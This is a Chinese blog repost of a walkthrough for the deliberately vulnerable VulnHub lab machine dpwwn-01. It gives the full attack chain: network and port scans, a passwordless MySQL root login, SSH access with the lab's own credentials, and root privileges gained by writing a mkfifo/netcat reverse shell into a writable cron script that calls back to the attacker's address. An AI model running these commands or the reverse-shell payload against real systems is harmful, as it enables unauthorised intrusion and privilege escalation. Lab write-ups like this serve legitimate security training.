记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

vulnhub之dpwwn-01的实践

2020-11-15 19:10

本周末实践的是vulnhub的dpwwn-01镜像,这个镜像比较简单,

下载地址,https://download.vulnhub.com/dpwwn/dpwwn-01.zip,

解压后一看就是vmware的虚机,当然就用workstation打开,

启动靶机,从console上没有看到ip地址,还是得自己去扫,

启动kali攻击机,先做地址扫描,

sudo netdiscover -r 192.168.137.0/24,

拿到靶机地址,192.168.137.26,接着做端口扫描,

sudo nmap -sS -sV -T5 -A -p- 192.168.137.26,

看到有mysql服务,尝试无密码连接一下,竟然进去了,

mysql -h 192.168.137.26 -u root -p,

然后经过一顿查询操作找到了一对儿用户名密码,

mistic/testP@$$swordmistic,

用这对儿用户名密码尝试ssh登录一下,竟然也进去了,id一下发现不是root,接下来需要想办法提权,

查看一下计划任务,cat /etc/crontab,发现/home/mistic/logrot.sh三分钟执行一次,而且这个脚本文件当前账户可写,

在kali攻击机上制作反弹shell脚本内容,

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.137.204 LPORT=4444 R,

并在kali攻击机上开启nc监听,nc -lnvp 4444,

在靶机上执行echo -e '#!/bin/bash\nmkfifo /tmp/slxjbbf; nc 192.168.137.204 4444 0</tmp/slxjbbf | /bin/sh >/tmp/slxjbbf 2>&1; rm /tmp/slxjbbf' > /home/mistic/logrot.sh,把反弹shell脚本内容写入定时任务脚本文件,

等待一会儿,就看到反弹shell过来了,id看一下,确认是root,完成。



知识来源: https://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650746070&idx=1&sn=3e80db92184f05293a872b9c2663a865

阅读:36501 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“vulnhub之dpwwn-01的实践”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云